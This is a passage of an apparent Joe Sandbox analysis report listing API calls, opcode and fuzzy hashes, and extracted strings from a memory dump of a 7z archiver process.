                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47D0C77660A945C1DB211FB9984036463559B94F74F184310CAB4493E0DF2584968711
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileTime
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1425588814-0
                                                                                                                                                                                                                                                  • Opcode ID: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
                                                                                                                                                                                                                                                  • Instruction ID: e7c8b01192ccd532cf3ddfe55ee24e8f51e8c2afbe1de764bf77678a0f3f8636
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6BB09230B12400C2CB0C6726ECA231C23606788B21FE14829C50BD5650CE1C85EA4700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 009A3E2A
                                                                                                                                                                                                                                                    • Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
                                                                                                                                                                                                                                                    • Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorExceptionLastThrowmalloc
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2114622545-0
                                                                                                                                                                                                                                                  • Opcode ID: ac085397a568cd8d14ceeec2df6ba23388e6ed1d835e247545a2bb9031c05b64
                                                                                                                                                                                                                                                  • Instruction ID: a1ada46f9997dcd9f251bd337bbb8e2ef5269cd03060694753caba63ee91ac06
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac085397a568cd8d14ceeec2df6ba23388e6ed1d835e247545a2bb9031c05b64
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B31A033205B4086DB159F25D584369B3A5FB86FD0F688524AF5E077A4DF38C955C380
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
                                                                                                                                                                                                                                                  • Instruction ID: 0e2b89b8ed37cbe556acdc1da323f4d2fe7d9647e535b4d00a5e399b1887ed20
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE2128737042409BCF24DF5EB80065A7798F785BE4F249224FE6A87784EB38C942C740
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                                                                  • Opcode ID: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
                                                                                                                                                                                                                                                  • Instruction ID: 13b94211159f899ddfc99b4845554ff28d9782637fc4c91797fcf7ece894f289
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 721159E3715650D7CBB08F6CE450368B254F740780B64C83EDBCE9BA10EB6ACC829301
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0099419C: free.MSVCRT ref: 009941B9
                                                                                                                                                                                                                                                    • Part of subcall function 0099419C: free.MSVCRT ref: 009941C5
                                                                                                                                                                                                                                                    • Part of subcall function 0099419C: free.MSVCRT ref: 009941D1
                                                                                                                                                                                                                                                    • Part of subcall function 0099419C: free.MSVCRT ref: 009941DD
                                                                                                                                                                                                                                                    • Part of subcall function 0099419C: free.MSVCRT ref: 009941E6
                                                                                                                                                                                                                                                    • Part of subcall function 0099419C: free.MSVCRT ref: 009941EF
                                                                                                                                                                                                                                                    • Part of subcall function 0099419C: free.MSVCRT ref: 009941F8
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009A3F45
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
                                                                                                                                                                                                                                                  • Instruction ID: 67c30614a9e18dd1c864cb81911bf730c27f054f8618fb2720fe2bbe8e28eaa4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D014C73A24390CADB219F1DC18116DBB24F759FE83689117EB4907760E732C883C7A1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
                                                                                                                                                                                                                                                  • Instruction ID: 256287c1f830ed8c087f4466126a4c1c443d51948b6dff1bcd4b1961451f992c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C016D7736624096E710CF14C56C35E7BA0B7D5B68F144208DBA84B3D1CB7AC54ACBA4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                                                                  • Opcode ID: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
                                                                                                                                                                                                                                                  • Instruction ID: a59773c226bca63c9454db75a5964895837b6771a1410ce487d92f8323ff57dc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35F0E5A335014887CB109F79998136822A1FB48795FD4983DFF8A87602EA28CC99C724
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009789D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 009789EA
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0097CB49
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 918212764-0
                                                                                                                                                                                                                                                  • Opcode ID: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
                                                                                                                                                                                                                                                  • Instruction ID: 91324d577c81ff321c97d88f865a9f3b6c0e3f742e27f08ffb15462ea924e895
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FAD05B82750094C6DB105AFD5CD53351181B718751FD0983DFE5FD6253E51DCDC9A229
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2162964266-0
                                                                                                                                                                                                                                                  • Opcode ID: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
                                                                                                                                                                                                                                                  • Instruction ID: ecf2786f6575141cc64700710cdb3526201f06979bf41687c35d4e5f02d90be9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CFD05EA67516C886CA049F27D68161DA3219BC8FE4708D4249F480BB0ADE20C8E58740
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 009789EA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                                                                  • Opcode ID: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
                                                                                                                                                                                                                                                  • Instruction ID: c268e5a8483c893fd6d11de00e5e67e8db94227b755457484f667ff04ec9ffb1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8D0C773601D4581DB251F7ED8443352359A755B74F188310DAB54A2D0DF2589D78715
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
                                                                                                                                                                                                                                                  • Instruction ID: b8d3bf0ee1b456760b123fdce851703d3a29e384374e5e1372b32fbd5fbf62b6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75C08C8378224842CA0D222B2F8732C02060FCABD1E8CC0209E4C0BB52DE548CE28710
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmove
                                                                                                                                                                                                                                                  • String ID: Can not open mapping$Incorrect Map command$Map data error$MapViewOfFile error$Unsupported Map data$Unsupported Map data size
                                                                                                                                                                                                                                                  • API String ID: 1534225298-798110030
                                                                                                                                                                                                                                                  • Opcode ID: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
                                                                                                                                                                                                                                                  • Instruction ID: 7ba088c8a1e8463af4955a74b7c2f6c53690a4ae43f46029e2b35b8885327f20
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75C15F73229A40C6DA10EF15F8A076EB764F7C5BA0F949532FA8E53A29DF38C445CB40
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
                                                                                                                                                                                                                                                  • Instruction ID: 27d3d69ed6004cd469b5799e88333b7ad594b2fef20a6915b3e0f087f4cb1a9d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3D15B37219AC481CA34DF26E464AAE7764F7CAB84F419052DF9E53B25CF38C845CB94
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process$AddressCurrentProc$fputs$HandleLibraryLoadModuleTimesmemset
                                                                                                                                                                                                                                                  • String ID: MCycles$GetProcessMemoryInfo$Global $H$K32GetProcessMemoryInfo$Kernel $Physical$Process$Psapi.dll$QueryProcessCycleTime$User $Virtual $kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 600854398-319139910
                                                                                                                                                                                                                                                  • Opcode ID: 4de089bbcb59170ecffb44d8e6b4bb1020c1b67aaf46552131cc09be39bde8ef
                                                                                                                                                                                                                                                  • Instruction ID: f6ffc0eb1f68d20661d769d7647dc03a9a168365ea92b2cb5976f60ec35a28d1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4de089bbcb59170ecffb44d8e6b4bb1020c1b67aaf46552131cc09be39bde8ef
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29518E66305A8582EF20DB69FD90BE97361F788B90F444026DE8E4376AEF3CD549C700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$free$memset$strlen$memmove
                                                                                                                                                                                                                                                  • String ID: data:
                                                                                                                                                                                                                                                  • API String ID: 527563900-3222861102
                                                                                                                                                                                                                                                  • Opcode ID: 4b6c5f9cdd3633745e31563a8c4377074848a1f4c9f847770a3d002162f2b606
                                                                                                                                                                                                                                                  • Instruction ID: 0e40c26b01fecd36d229e899b5341491914f9ba3914210b1812c7ecb180b4a0b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b6c5f9cdd3633745e31563a8c4377074848a1f4c9f847770a3d002162f2b606
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0023573208682D7DB20DF35EA903EE7760F3D47A8F849112EA4A47669DF78CA49C740
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009AFAAC
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009AFAC0
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009AFC43
                                                                                                                                                                                                                                                    • Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
                                                                                                                                                                                                                                                    • Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F
                                                                                                                                                                                                                                                    • Part of subcall function 009AF820: _CxxThrowException.MSVCRT ref: 009AF88D
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B0031
                                                                                                                                                                                                                                                    • Part of subcall function 009AF8B8: memmove.MSVCRT ref: 009AF91E
                                                                                                                                                                                                                                                    • Part of subcall function 009AF8B8: free.MSVCRT ref: 009AF926
                                                                                                                                                                                                                                                    • Part of subcall function 009AF93C: memmove.MSVCRT ref: 009AF992
                                                                                                                                                                                                                                                    • Part of subcall function 009AF93C: free.MSVCRT ref: 009AF99A
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B00EA
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B00F2
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B0101
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B010A
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B0113
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B0121
                                                                                                                                                                                                                                                  • _CxxThrowException.MSVCRT ref: 009B0184
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • Internal file name collision (file on disk, file in archive):, xrefs: 009B015D
                                                                                                                                                                                                                                                  • Duplicate filename in archive:, xrefs: 009B0149
                                                                                                                                                                                                                                                  • Duplicate filename on disk:, xrefs: 009AFCB4
                                                                                                                                                                                                                                                  Memory Dump Source
